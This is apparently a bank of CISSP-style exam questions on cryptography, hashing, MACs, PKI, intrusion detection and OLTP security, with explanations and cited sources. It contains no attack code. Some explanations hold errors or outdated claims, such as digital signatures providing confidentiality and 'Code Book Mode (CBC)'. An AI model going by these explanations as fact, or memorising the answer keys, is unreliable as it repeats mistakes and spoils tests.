Which of the following ciphers is a subset on which the Vigenere polyalphabetic cipher was based on?
Caesar
The Jefferson disks
Enigma
SIGABA
In cryptography, a Caesar cipher, also known as Caesar's cipher, the shift cipher, Caesar's code or Caesar shift, is one of the simplest and most widely known encryption techniques. It is a type of substitution cipher in which each letter in the plaintext is replaced by a letter some fixed number of positions down the alphabet. For example, with a left shift of 3, D would be replaced by A, E would become B, and so on. The method is named after Julius Caesar, who used it in his private correspondence.
The encryption step performed by a Caesar cipher is often incorporated as part of more complex schemes, such as the Vigenère cipher, and still has modern application in the ROT13 system. As with all single alphabet substitution ciphers, the Caesar cipher is easily broken and in modern practice offers essentially no communication security.
The following answer were incorrect:
The Jefferson disk, or wheel cipher as Thomas Jefferson named it, also known as the Bazeries Cylinder, is a cipher system using a set of wheels or disks, each with the 26 letters of the alphabet arranged around their edge. The order of the letters is different for each disk and is usually scrambled in some random way. Each disk is marked with a unique number. A hole in the centre of the disks allows them to be stacked on an axle. The disks are removable and can be mounted on the axle in any order desired. The order of the disks is the cipher key, and both sender and receiver must arrange the disks in the same predefined order. Jefferson's device had 36 disks.
An Enigma machine is any of a family of related electro-mechanical rotor cipher machines used for the encryption and decryption of secret messages. Enigma was invented by the German engineer Arthur Scherbius at the end of World War I. The early models were used commercially from the early 1920s, and adopted by military and government services of several countries. Several different Enigma models were produced, but the German military models are the ones most commonly discussed.
SIGABA: In the history of cryptography, the ECM Mark II was a cipher machine used by the United States for message encryption from World War II until the 1950s. The machine was also known as the SIGABA or Converter M-134 by the Army, or CSP-888/889 by the Navy, and a modified Navy version was termed the CSP-2900. Like many machines of the era it used an electromechanical system of rotors in order to encipher messages, but with a number of security improvements over previous designs. No successful cryptanalysis of the machine during its service lifetime is publicly known.
Reference(s) used for this question:
http://en.wikipedia.org/wiki/Jefferson_disk
http://en.wikipedia.org/wiki/Sigaba
http://en.wikipedia.org/wiki/Enigma_machine
Virus scanning and content inspection of SMIME encrypted e-mail without doing any further processing is:
Not possible
Only possible with key recovery scheme of all user keys
It is possible only if X509 Version 3 certificates are used
It is possible only by "brute force" decryption
Content security measures presumes that the content is available in cleartext on the central mail server.
Encrypted emails have to be decrypted before it can be filtered (e.g. to detect viruses), so you need the decryption key on the central "crypto mail server".
There are several ways for such key management, e.g. by message or key recovery methods. However, that would certainly require further processing in order to achieve such goal.
What is NOT true with pre shared key authentication within IKE / IPsec protocol?
Pre shared key authentication is normally based on simple passwords
Needs a Public Key Infrastructure (PKI) to work
IKE is used to setup Security Associations
IKE builds upon the Oakley protocol and the ISAKMP protocol.
Internet Key Exchange (IKE or IKEv2) is the protocol used to set up a security association (SA) in the IPsec protocol suite. IKE builds upon the Oakley protocol and ISAKMP. IKE uses X.509 certificates for authentication which are either pre-shared or distributed using DNS (preferably with DNSSEC) and a Diffie–Hellman key exchange to set up a shared session secret from which cryptographic keys are derived.
Internet Key Exchange (IKE) Internet key exchange allows communicating partners to prove their identity to each other and establish a secure communication channel, and is applied as an authentication component of IPSec.
IKE uses two phases:
Phase 1: In this phase, the partners authenticate with each other, using one of the following:
Shared Secret: A key that is exchanged by humans via telephone, fax, encrypted e-mail, etc.
Public Key Encryption: Digital certificates are exchanged.
Revised mode of Public Key Encryption: To reduce the overhead of public key encryption, a nonce (a Cryptographic function that refers to a number or bit string used only once, in security engineering) is encrypted with the communicating partner’s public key, and the peer’s identity is encrypted with symmetric encryption using the nonce as the key. Next, IKE establishes a temporary security association and secure tunnel to protect the rest of the key exchange. Phase 2: The peers’ security associations are established, using the secure tunnel and temporary SA created at the end of phase 1.
The following reference(s) were used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 7032-7048). Auerbach Publications. Kindle Edition.
and
RFC 2409 at http://tools.ietf.org/html/rfc2409
and
http://en.wikipedia.org/wiki/Internet_Key_Exchange
Which of the following is best provided by symmetric cryptography?
Confidentiality
Integrity
Availability
Non-repudiation
When using symmetric cryptography, both parties will be using the same key for encryption and decryption. Symmetric cryptography is generally fast and can be hard to break, but it offers limited overall security in the fact that it can only provide confidentiality.
Source: WALLHOFF, John, CBK#5 Cryptography (CISSP Study Guide), April 2002 (page 2).
Which of the following is a symmetric encryption algorithm?
RSA
Elliptic Curve
RC5
El Gamal
RC5 is a symmetric encryption algorithm. It is a block cipher of variable block length, encrypts through integer addition, the application of a bitwise Exclusive OR (XOR), and variable rotations.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 4: Cryptography (page 153).
Which of the following statements pertaining to stream ciphers is correct?
A stream cipher is a type of asymmetric encryption algorithm.
A stream cipher generates what is called a keystream.
A stream cipher is slower than a block cipher.
A stream cipher is not appropriate for hardware-based encryption.
A stream cipher is a type of symmetric encryption algorithm that operates on continuous streams of plain text and is appropriate for hardware-based encryption.
Stream ciphers can be designed to be exceptionally fast, much faster than any block cipher. A stream cipher generates what is called a keystream (a sequence of bits used as a key).
Stream ciphers can be viewed as approximating the action of a proven unbreakable cipher, the one-time pad (OTP), sometimes known as the Vernam cipher. A one-time pad uses a keystream of completely random digits. The keystream is combined with the plaintext digits one at a time to form the ciphertext. This system was proved to be secure by Claude Shannon in 1949. However, the keystream must be (at least) the same length as the plaintext, and generated completely at random. This makes the system very cumbersome to implement in practice, and as a result the one-time pad has not been widely used, except for the most critical applications.
A stream cipher makes use of a much smaller and more convenient key — 128 bits, for example. Based on this key, it generates a pseudorandom keystream which can be combined with the plaintext digits in a similar fashion to the one-time pad. However, this comes at a cost: because the keystream is now pseudorandom, and not truly random, the proof of security associated with the one-time pad no longer holds: it is quite possible for a stream cipher to be completely insecure if it is not implemented properly as we have seen with the Wired Equivalent Privacy (WEP) protocol.
Encryption is accomplished by combining the keystream with the plaintext, usually with the bitwise XOR operation.
Source: DUPUIS, Clement, CISSP Open Study Guide on domain 5, cryptography, April 1999.
More details can be obtained on Stream Ciphers in RSA Security's FAQ on Stream Ciphers.
Which of the following offers confidentiality to an e-mail message?
The sender encrypting it with its private key.
The sender encrypting it with its public key.
The sender encrypting it with the receiver's public key.
The sender encrypting it with the receiver's private key.
An e-mail message's confidentiality is protected when encrypted with the receiver's public key, because he is the only one able to decrypt the message. The sender is not supposed to have the receiver's private key. By encrypting a message with its private key, anybody possessing the corresponding public key would be able to read the message. By encrypting the message with its public key, not even the receiver would be able to read the message.
Source: HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, chapter 8: Cryptography (page 517).
The computations involved in selecting keys and in enciphering data are complex, and are not practical for manual use. However, using mathematical properties of modular arithmetic and a method known as "_________________," RSA is quite feasible for computer use.
computing in Galois fields
computing in Gladden fields
computing in Gallipoli fields
computing in Galbraith fields
The computations involved in selecting keys and in enciphering data are complex, and are not practical for manual use. However, using mathematical properties of modular arithmetic and a method known as computing in Galois fields, RSA is quite feasible for computer use.
Source: FITES, Philip E., KRATZ, Martin P., Information Systems Security: A Practitioner's Reference, 1993, Van Nostrand Reinhold, page 44.
Which of the following service is not provided by a public key infrastructure (PKI)?
Access control
Integrity
Authentication
Reliability
A Public Key Infrastructure (PKI) provides confidentiality, access control, integrity, authentication and non-repudiation.
It does not provide reliability services.
Reference(s) used for this question:
TIPTON, Hal, (ISC)2, Introduction to the CISSP Exam presentation.
Which of the following is more suitable for a hardware implementation?
Stream ciphers
Block ciphers
Cipher block chaining
Electronic code book
A stream cipher treats the message as a stream of bits or bytes and performs mathematical functions on them individually. The key is a random value input into the stream cipher, which it uses to ensure the randomness of the keystream data. They are more suitable for hardware implementations, because they encrypt and decrypt one bit at a time. They are intensive because each bit must be manipulated, which works better at the silicon level. Block ciphers operate a the block level, dividing the message into blocks of bits. Cipher Block chaining (CBC) and Electronic Code Book (ECB) are operation modes of DES, a block encryption algorithm.
Source: WALLHOFF, John, CBK#5 Cryptography (CISSP Study Guide), April 2002 (page 2).
Which of the following is not a one-way hashing algorithm?
MD2
RC4
SHA-1
HAVAL
RC4 was designed by Ron Rivest of RSA Security in 1987. While it is officially termed "Rivest Cipher 4", the RC acronym is alternatively understood to stand for "Ron's Code" (see also RC2, RC5 and RC6).
RC4 was initially a trade secret, but in September 1994 a description of it was anonymously posted to the Cypherpunks mailing list. It was soon posted on the sci.crypt newsgroup, and from there to many sites on the Internet. The leaked code was confirmed to be genuine as its output was found to match that of proprietary software using licensed RC4. Because the algorithm is known, it is no longer a trade secret. The name RC4 is trademarked, so RC4 is often referred to as ARCFOUR or ARC4 (meaning alleged RC4) to avoid trademark problems. RSA Security has never officially released the algorithm; Rivest has, however, linked to the English Wikipedia article on RC4 in his own course notes. RC4 has become part of some commonly used encryption protocols and standards, including WEP and WPA for wireless cards and TLS.
The main factors in RC4's success over such a wide range of applications are its speed and simplicity: efficient implementations in both software and hardware are very easy to develop.
The following answer were not correct choices:
SHA-1 is a one-way hashing algorithms. SHA-1 is a cryptographic hash function designed by the United States National Security Agency and published by the United States NIST as a U.S. Federal Information Processing Standard. SHA stands for "secure hash algorithm".
The three SHA algorithms are structured differently and are distinguished as SHA-0, SHA-1, and SHA-2. SHA-1 is very similar to SHA-0, but corrects an error in the original SHA hash specification that led to significant weaknesses. The SHA-0 algorithm was not adopted by many applications. SHA-2 on the other hand significantly differs from the SHA-1 hash function.
SHA-1 is the most widely used of the existing SHA hash functions, and is employed in several widely used security applications and protocols. In 2005, security flaws were identified in SHA-1, namely that a mathematical weakness might exist, indicating that a stronger hash function would be desirable. Although no successful attacks have yet been reported on the SHA-2 variants, they are algorithmically similar to SHA-1 and so efforts are underway to develop improved alternatives. A new hash standard, SHA-3, is currently under development — an ongoing NIST hash function competition is scheduled to end with the selection of a winning function in 2012.
SHA-1 produces a 160-bit message digest based on principles similar to those used by Ronald L. Rivest of MIT in the design of the MD4 and MD5 message digest algorithms, but has a more conservative design.
MD2 is a one-way hashing algorithms. The MD2 Message-Digest Algorithm is a cryptographic hash function developed by Ronald Rivest in 1989. The algorithm is optimized for 8-bit computers. MD2 is specified in RFC 1319. Although MD2 is no longer considered secure, even as of 2010 it remains in use in public key infrastructures as part of certificates generated with MD2 and RSA.
Haval is a one-way hashing algorithms. HAVAL is a cryptographic hash function. Unlike MD5, but like most modern cryptographic hash functions, HAVAL can produce hashes of different lengths. HAVAL can produce hashes in lengths of 128 bits, 160 bits, 192 bits, 224 bits, and 256 bits. HAVAL also allows users to specify the number of rounds (3, 4, or 5) to be used to generate the hash.
The following reference(s) were used for this question:
SHIREY, Robert W., RFC2828: Internet Security Glossary, may 2000.
and
https://en.wikipedia.org/wiki/HAVAL
and
https://en.wikipedia.org/wiki/MD2_%28cryptography%29
and
https://en.wikipedia.org/wiki/SHA-1
Which of the following is NOT a known type of Message Authentication Code (MAC)?
Keyed-hash message authentication code (HMAC)
DES-CBC
Signature-based MAC (SMAC)
Universal Hashing Based MAC (UMAC)
There is no such thing as a Signature-Based MAC. Being the wrong choice in the list, it is the best answer to this question.
WHAT IS A Message Authentication Code (MAC)?
In Cryptography, a MAC (Message Authentication Code) also known as a cryptographic checksum, is a small block of data that is generated using a secret key and then appended to the message. When the message is received, the recipient can generate their own MAC using the secret key, and thereby know that the message has not changed either accidentally or intentionally in transit. Of course, this assurance is only as strong as the trust that the two parties have that no one else has access to the secret key.
A MAC is a small representation of a message and has the following characteristics:
A MAC is much smaller than the message generating it.
Given a MAC, it is impractical to compute the message that generated it.
Given a MAC and the message that generated it, it is impractical to find another message generating the same MAC.
See the graphic below from Wikipedia showing the creation of a MAC value:
Message Authentication Code MAC HMAC
In the example above, the sender of a message runs it through a MAC algorithm to produce a MAC data tag. The message and the MAC tag are then sent to the receiver. The receiver in turn runs the message portion of the transmission through the same MAC algorithm using the same key, producing a second MAC data tag. The receiver then compares the first MAC tag received in the transmission to the second generated MAC tag. If they are identical, the receiver can safely assume that the integrity of the message was not compromised, and the message was not altered or tampered with during transmission.
However, to allow the receiver to be able to detect replay attacks, the message itself must contain data that assures that this same message can only be sent once (e.g. time stamp, sequence number or use of a one-time MAC). Otherwise an attacker could — without even understanding its content — record this message and play it back at a later time, producing the same result as the original sender.
NOTE: There are many ways of producing a MAC value. Below you have a short list of some implementation.
The following were incorrect answers for this question:
They were all incorrect answers because they are all real type of MAC implementation.
In the case of DES-CBC, a MAC is generated using the DES algorithm in CBC mode, and the secret DES key is shared by the sender and the receiver. The MAC is actually just the last block of ciphertext generated by the algorithm. This block of data (64 bits) is attached to the unencrypted message and transmitted to the far end. All previous blocks of encrypted data are discarded to prevent any attack on the MAC itself. The receiver can just generate his own MAC using the secret DES key he shares to ensure message integrity and authentication. He knows that the message has not changed because the chaining function of CBC would significantly alter the last block of data if any bit had changed anywhere in the message. He knows the source of the message (authentication) because only one other person holds the secret key.
A Keyed-hash message authentication code (HMAC) is a specific construction for calculating a message authentication code (MAC) involving a cryptographic hash function in combination with a secret cryptographic key. As with any MAC, it may be used to simultaneously verify both the data integrity and the authentication of a message. Any cryptographic hash function, such as MD5, SHA-1, may be used in the calculation of an HMAC; the resulting MAC algorithm is termed HMAC-MD5 or HMAC-SHA1 accordingly. The cryptographic strength of the HMAC depends upon the cryptographic strength of the underlying hash function, the size of its hash output, and on the size and quality of the key.
A message authentication code based on universal hashing, or UMAC, is a type of message authentication code (MAC) calculated choosing a hash function from a class of hash functions according to some secret (random) process and applying it to the message. The resulting digest or fingerprint is then encrypted to hide the identity of the hash function used. As with any MAC, it may be used to simultaneously verify both the data integrity and the authenticity of a message. UMAC is specified in RFC 4418, it has provable cryptographic strength and is usually a lot less computationally intensive than other MACs.
What is the MicMac (confusion) with MIC and MAC?
The term message integrity code (MIC) is frequently substituted for the term MAC, especially in communications, where the acronym MAC traditionally stands for Media Access Control when referring to Networking. However, some authors use MIC as a distinctly different term from a MAC; in their usage of the term the MIC operation does not use secret keys. This lack of security means that any MIC intended for use gauging message integrity should be encrypted or otherwise be protected against tampering. MIC algorithms are created such that a given message will always produce the same MIC assuming the same algorithm is used to generate both. Conversely, MAC algorithms are designed to produce matching MACs only if the same message, secret key and initialization vector are input to the same algorithm. MICs do not use secret keys and, when taken on their own, are therefore a much less reliable gauge of message integrity than MACs. Because MACs use secret keys, they do not necessarily need to be encrypted to provide the same level of assurance.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 15799-15815). Auerbach Publications. Kindle Edition.
and
http://en.wikipedia.org/wiki/Message_authentication_code
and
http://tools.ietf.org/html/rfc4418
Which of the following issues is not addressed by digital signatures?
nonrepudiation
authentication
data integrity
denial-of-service
A digital signature directly addresses both confidentiality and integrity of the CIA triad. It does not directly address availability, which is what denial-of-service attacks.
The other answers are not correct because:
"nonrepudiation" is not correct because a digital signature can provide for nonrepudiation.
"authentication" is not correct because a digital signature can be used as an authentication mechanism
"data integrity" is not correct because a digital signature does verify data integrity (as part of nonrepudiation)
References:
Official ISC2 Guide page: 227 & 265
All in One Third Edition page: 648
Which of the following is not an example of a block cipher?
Skipjack
IDEA
Blowfish
RC4
RC4 is a proprietary, variable-key-length stream cipher invented by Ron Rivest for RSA Data Security, Inc. Skipjack, IDEA and Blowfish are examples of block ciphers.
Source: SHIREY, Robert W., RFC2828: Internet Security Glossary, may 2000.
Which of the following encryption methods is known to be unbreakable?
Symmetric ciphers.
DES codebooks.
One-time pads.
Elliptic Curve Cryptography.
A One-Time Pad uses a keystream string of bits that is generated completely at random that is used only once. Because it is used only once it is considered unbreakable.
The following answers are incorrect:
Symmetric ciphers. This is incorrect because a Symmetric Cipher is created by substitution and transposition. They can and have been broken
DES codebooks. This is incorrect because Data Encryption Standard (DES) has been broken, it was replaced by Advanced Encryption Standard (AES).
Elliptic Curve Cryptography. This is incorrect because Elliptic Curve Cryptography or ECC is typically used on wireless devices such as cellular phones that have small processors. Because of the lack of processing power the keys used at often small. The smaller the key, the easier it is considered to be breakable. Also, the technology has not been around long enough or tested thourough enough to be considered truly unbreakable.
Which protocol makes USE of an electronic wallet on a customer's PC and sends encrypted credit card information to merchant's Web server, which digitally signs it and sends it on to its processing bank?
SSH ( Secure Shell)
S/MIME (Secure MIME)
SET (Secure Electronic Transaction)
SSL (Secure Sockets Layer)
As protocol was introduced by Visa and Mastercard to allow for more credit card transaction possibilities. It is comprised of three different pieces of software, running on the customer's PC (an electronic wallet), on the merchant's Web server and on the payment server of the merchant's bank. The credit card information is sent by the customer to the merchant's Web server, but it does not open it and instead digitally signs it and sends it to its bank's payment server for processing.
The following answers are incorrect because :
SSH (Secure Shell) is incorrect as it functions as a type of tunneling mechanism that provides terminal like access to remote computers.
S/MIME is incorrect as it is a standard for encrypting and digitally signing electronic mail and for providing secure data transmissions.
SSL is incorrect as it uses public key encryption and provides data encryption, server authentication, message integrity, and optional client authentication.
Reference : Shon Harris AIO v3 , Chapter-8: Cryptography , Page : 667-669
Which of the following are suitable protocols for securing VPN connections at the lower layers of the OSI model?
S/MIME and SSH
TLS and SSL
IPsec and L2TP
PKCS#10 and X.509
What key size is used by the Clipper Chip?
40 bits
56 bits
64 bits
80 bits
The Clipper Chip is a NSA designed tamperproof chip for encrypting data and it uses the SkipJack algorithm. Each Clipper Chip has a unique serial number and a copy of the unit key is stored in the database under this serial number. The sending Clipper Chip generates and sends a Law Enforcement Access Field (LEAF) value included in the transmitted message. It is based on a 80-bit key and a 16-bit checksum.
Source: WALLHOFF, John, CBK#5 Cryptography (CISSP Study Guide), April 2002 (page 1).
Which of the following algorithms is used today for encryption in PGP?
RSA
IDEA
Blowfish
RC5
The Pretty Good Privacy (PGP) email encryption system was developed by Phil Zimmerman. For encrypting messages, it actually uses AES with up to 256-bit keys, CAST, TripleDES, IDEA and Twofish. RSA is also used in PGP, but only for symmetric key exchange and for digital signatures, but not for encryption.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 4: Cryptography (pages 154, 169).
More info on PGP can be found on their site at http://www.pgp.com/display.php?pageID=29.
Which of the following answers is described as a random value used in cryptographic algorithms to ensure that patterns are not created during the encryption process?
IV - Initialization Vector
Stream Cipher
OTP - One Time Pad
Ciphertext
The basic power in cryptography is randomness. This uncertainty is why encrypted data is unusable to someone without the key to decrypt.
Initialization Vectors are a used with encryption keys to add an extra layer of randomness to encrypted data. If no IV is used the attacker can possibly break the keyspace because of patterns resulting in the encryption process. Implementation such as DES in Code Book Mode (CBC) would allow frequency analysis attack to take place.
In cryptography, an initialization vector (IV) or starting variable (SV)is a fixed-size input to a cryptographic primitive that is typically required to be random or pseudorandom. Randomization is crucial for encryption schemes to achieve semantic security, a property whereby repeated usage of the scheme under the same key does not allow an attacker to infer relationships between segments of the encrypted message. For block ciphers, the use of an IV is described by so-called modes of operation. Randomization is also required for other primitives, such as universal hash functions and message authentication codes based thereon.
It is define by TechTarget as:
An initialization vector (IV) is an arbitrary number that can be used along with a secret key for data encryption. This number, also called a nonce, is employed only one time in any session.
The use of an IV prevents repetition in data encryption, making it more difficult for a hacker using a dictionary attack to find patterns and break a cipher. For example, a sequence might appear twice or more within the body of a message. If there are repeated sequences in encrypted data, an attacker could assume that the corresponding sequences in the message were also identical. The IV prevents the appearance of corresponding duplicate character sequences in the ciphertext.
The following answers are incorrect:
- Stream Cipher: This isn't correct. A stream cipher is a symmetric key cipher where plaintext digits are combined with pseudorandom key stream to product cipher text.
- OTP - One Time Pad: This isn't correct but OTP is made up of random values used as key material. (Encryption key) It is considered by most to be unbreakable but must be changed with a new key after it is used which makes it impractical for common use.
- Ciphertext: Sorry, incorrect answer. Ciphertext is basically text that has been encrypted with key material (Encryption key)
The following reference(s) was used to create this question:
For more details on this TOPIC and other QUESTION NO: s of the Security+ CBK, subscribe to our Holistic Computer Based Tutorial (CBT) at http://www.cccure.tv
and
whatis.techtarget.com/definition/initialization-vector-IV
and
en.wikipedia.org/wiki/Initialization_vector
Which of the following is NOT an asymmetric key algorithm?
RSA
Elliptic Curve Cryptosystem (ECC)
El Gamal
Data Encryption System (DES)
Data Encryption Standard (DES) is a symmetric key algorithm. Originally developed by IBM, under project name Lucifer, this 128-bit algorithm was accepted by the NIST in 1974, but the key size was reduced to 56 bits, plus 8 bits for parity. It somehow became a national cryptographic standard in 1977, and an American National Standard Institute (ANSI) standard in 1978. DES was later replaced by the Advanced Encryption Standard (AES) by the NIST. All other options are asymmetric algorithms.
Source: HARRIS, Shon, All-In-One CISSP Certification Exam Guide, McGraw-Hill/Osborne, 2002, chapter 8: Cryptography (page 525).
What is the name of a one way transformation of a string of characters into a usually shorter fixed-length value or key that represents the original string? Such a transformation cannot be reversed?
One-way hash
DES
Transposition
Substitution
A cryptographic hash function is a transformation that takes an input (or 'message') and returns a fixed-size string, which is called the hash value (sometimes termed a message digest, a digital fingerprint, a digest or a checksum).
The ideal hash function has three main properties - it is extremely easy to calculate a hash for any given data, it is extremely difficult or almost impossible in a practical sense to calculate a text that has a given hash, and it is extremely unlikely that two different messages, however close, will have the same hash.
Functions with these properties are used as hash functions for a variety of purposes, both within and outside cryptography. Practical applications include message integrity checks, digital signatures, authentication, and various information security applications. A hash can also act as a concise representation of the message or document from which it was computed, and allows easy indexing of duplicate or unique data files.
In various standards and applications, the two most commonly used hash functions are MD5 and SHA-1. In 2005, security flaws were identified in both of these, namely that a possible mathematical weakness might exist, indicating that a stronger hash function would be desirable. In 2007 the National Institute of Standards and Technology announced a contest to design a hash function which will be given the name SHA-3 and be the subject of a FIPS standard.
A hash function takes a string of any length as input and produces a fixed length string which acts as a kind of "signature" for the data provided. In this way, a person knowing the hash is unable to work out the original message, but someone knowing the original message can prove the hash is created from that message, and none other. A cryptographic hash function should behave as much as possible like a random function while still being deterministic and efficiently computable.
A cryptographic hash function is considered "insecure" from a cryptographic point of view, if either of the following is computationally feasible:
finding a (previously unseen) message that matches a given digest
finding "collisions", wherein two different messages have the same message digest.
An attacker who can do either of these things might, for example, use them to substitute an authorized message with an unauthorized one.
Ideally, it should not even be feasible to find two messages whose digests are substantially similar; nor would one want an attacker to be able to learn anything useful about a message given only its digest. Of course the attacker learns at least one piece of information, the digest itself, which for instance gives the attacker the ability to recognise the same message should it occur again.
REFERENCES:
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Pages 40-41.
also see:
http://en.wikipedia.org/wiki/Cryptographic_hash_function
Which type of attack is based on the probability of two different messages using the same hash function producing a common message digest?
Differential cryptanalysis
Differential linear cryptanalysis
Birthday attack
Statistical attack
A Birthday attack is usually applied to the probability of two different messages using the same hash function producing a common message digest.
The term "birthday" comes from the fact that in a room with 23 people, the probability of two of more people having the same birthday is greater than 50%.
Linear cryptanalysis is a general form of cryptanalysis based on finding affine approximations to the action of a cipher. Attacks have been developed for block ciphers and stream ciphers. Linear cryptanalysis is one of the two most widely used attacks on block ciphers; the other being differential cryptanalysis.
Differential Cryptanalysis is a potent cryptanalytic technique introduced by Biham and Shamir. Differential cryptanalysis is designed for the study and attack of DES-like cryptosystems. A DES-like cryptosystem is an iterated cryptosystem which relies on conventional cryptographic techniques such as substitution and diffusion.
Differential cryptanalysis is a general form of cryptanalysis applicable primarily to block ciphers, but also to stream ciphers and cryptographic hash functions. In the broadest sense, it is the study of how differences in an input can affect the resultant difference at the output. In the case of a block cipher, it refers to a set of techniques for tracing differences through the network of transformations, discovering where the cipher exhibits non-random behaviour, and exploiting such properties to recover the secret key.
Source:
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 4: Cryptography (page 163).
and
http://en.wikipedia.org/wiki/Differential_cryptanalysis
Which of the following Intrusion Detection Systems (IDS) uses a database of attacks, known system vulnerabilities, monitoring current attempts to exploit those vulnerabilities, and then triggers an alarm if an attempt is found?
Knowledge-Based ID System
Application-Based ID System
Host-Based ID System
Network-Based ID System
Knowledge-based Intrusion Detection Systems use a database of previous attacks and known system vulnerabilities to look for current attempts to exploit their vulnerabilities, and trigger an alarm if an attempt is found.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 87.
Application-Based ID System - "a subset of HIDS that analyze what's going on in an application using the transaction log files of the application." Source: Official ISC2 CISSP CBK Review Seminar Student Manual Version 7.0 p. 87
Host-Based ID System - "an implementation of IDS capabilities at the host level. Its most significant difference from NIDS is intrusion detection analysis, and related processes are limited to the boundaries of the host." Source: Official ISC2 Guide to the CISSP CBK - p. 197
Network-Based ID System - "a network device, or dedicated system attached to teh network, that monitors traffic traversing teh network segment for which it is integrated." Source: Official ISC2 Guide to the CISSP CBK - p. 196
What ensures that the control mechanisms correctly implement the security policy for the entire life cycle of an information system?
Accountability controls
Mandatory access controls
Assurance procedures
Administrative controls
Controls provide accountability for individuals accessing information. Assurance procedures ensure that access control mechanisms correctly implement the security policy for the entire life cycle of an information system.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 2: Access control systems (page 33).
Which of the following is needed for System Accountability?
Audit mechanisms.
Documented design as laid out in the Common Criteria.
Authorization.
Formal verification of system design.
Is a means of being able to track user actions. Through the use of audit logs and other tools the user actions are recorded and can be used at a later date to verify what actions were performed.
Accountability is the ability to identify users and to be able to track user actions.
The following answers are incorrect:
Documented design as laid out in the Common Criteria. Is incorrect because the Common Criteria is an international standard to evaluate trust and would not be a factor in System Accountability.
Authorization. Is incorrect because Authorization is granting access to subjects, just because you have authorization does not hold the subject accountable for their actions.
Formal verification of system design. Is incorrect because all you have done is to verify the system design and have not taken any steps toward system accountability.
References:
OIG CBK Glossary (page 778)
Which of the following would be LESS likely to prevent an employee from reporting an incident?
They are afraid of being pulled into something they don't want to be involved with.
The process of reporting incidents is centralized.
They are afraid of being accused of something they didn't do.
They are unaware of the company's security policies and procedures.
The reporting process should be centralized else employees won't bother.
The other answers are incorrect because :
They are afraid of being pulled into something they don't want to be involved with is incorrect as most of the employees fear of this and this would prevent them to report an incident.
They are afraid of being accused of something they didn't do is also incorrect as this also prevents them to report an incident.
They are unaware of the company's security policies and procedures is also incorrect as mentioned above.
Reference : Shon Harris AIO v3 , Ch-10 : Laws , Investigatio & Ethics , Page : 675.
Which of the following tools is less likely to be used by a hacker?
l0phtcrack
Tripwire
OphCrack
John the Ripper
Tripwire is an integrity checking product, triggering alarms when important files (e.g. system or configuration files) are modified.
This is a tool that is not likely to be used by hackers, other than for studying its workings in order to circumvent it.
Other programs are password-cracking programs and are likely to be used by security administrators as well as by hackers. More info regarding Tripwire available on the Tripwire, Inc. Web Site.
NOTE:
The biggest competitor to the commercial version of Tripwire is the freeware version of Tripwire. You can get the Open Source version of Tripwire at the following URL: http://sourceforge.net/projects/tripwire/
In an online transaction processing system (OLTP), which of the following actions should be taken when erroneous or invalid transactions are detected?
The transactions should be dropped from processing.
The transactions should be processed after the program makes adjustments.
The transactions should be written to a report and reviewed.
The transactions should be corrected and reprocessed.
In an online transaction processing system (OLTP) all transactions are recorded as they occur. When erroneous or invalid transactions are detected the transaction can be recovered by reviewing the logs.
As explained in the ISC2 OIG:
OLTP is designed to record all of the business transactions of an organization as they occur. It is a data processing system facilitating and managing transaction-oriented applications. These are characterized as a system used by many concurrent users who are actively adding and modifying data to effectively change real-time data.
OLTP environments are frequently found in the finance, telecommunications, insurance, retail, transportation, and travel industries. For example, airline ticket agents enter data in the database in real-time by creating and modifying travel reservations, and these are increasingly joined by users directly making their own reservations and purchasing tickets through airline company Web sites as well as discount travel Web site portals. Therefore, millions of people may be accessing the same flight database every day, and dozens of people may be looking at a specific flight at the same time.
The security concerns for OLTP systems are concurrency and atomicity.
Concurrency controls ensure that two users cannot simultaneously change the same data, or that one user cannot make changes before another user is finished with it. In an airline ticket system, it is critical for an agent processing a reservation to complete the transaction, especially if it is the last seat available on the plane.
Atomicity ensures that all of the steps involved in the transaction complete successfully. If one step should fail, then the other steps should not be able to complete. Again, in an airline ticketing system, if the agent does not enter a name into the name data field correctly, the transaction should not be able to complete.
OLTP systems should act as a monitoring system and detect when individual processes abort, automatically restart an aborted process, back out of a transaction if necessary, allow distribution of multiple copies of application servers across machines, and perform dynamic load balancing.
A security feature uses transaction logs to record information on a transaction before it is processed, and then mark it as processed after it is done. If the system fails during the transaction, the transaction can be recovered by reviewing the transaction logs.
Checkpoint restart is the process of using the transaction logs to restart the machine by running through the log to the last checkpoint or good transaction. All transactions following the last checkpoint are applied before allowing users to access the data again.
Wikipedia has nice coverage on what is OLTP:
Online transaction processing, or OLTP, refers to a class of systems that facilitate and manage transaction-oriented applications, typically for data entry and retrieval transaction processing. The term is somewhat ambiguous; some understand a "transaction" in the context of computer or database transactions, while others (such as the Transaction Processing Performance Council) define it in terms of business or commercial transactions.
OLTP has also been used to refer to processing in which the system responds immediately to user requests. An automatic teller machine (ATM) for a bank is an example of a commercial transaction processing application.
The technology is used in a number of industries, including banking, airlines, mailorder, supermarkets, and manufacturing. Applications include electronic banking, order processing, employee time clock systems, e-commerce, and eTrading.
There are two security concerns for OLTP system: Concurrency and Atomicity
ATOMICITY
In database systems, atomicity (or atomicness) is one of the ACID transaction properties. In an atomic transaction, a series of database operations either all occur, or nothing occurs. A guarantee of atomicity prevents updates to the database occurring only partially, which can cause greater problems than rejecting the whole series outright.
The etymology of the phrase originates in the Classical Greek concept of a fundamental and indivisible component; see atom.
An example of atomicity is ordering an airline ticket where two actions are required: payment, and a seat reservation. The potential passenger must either:
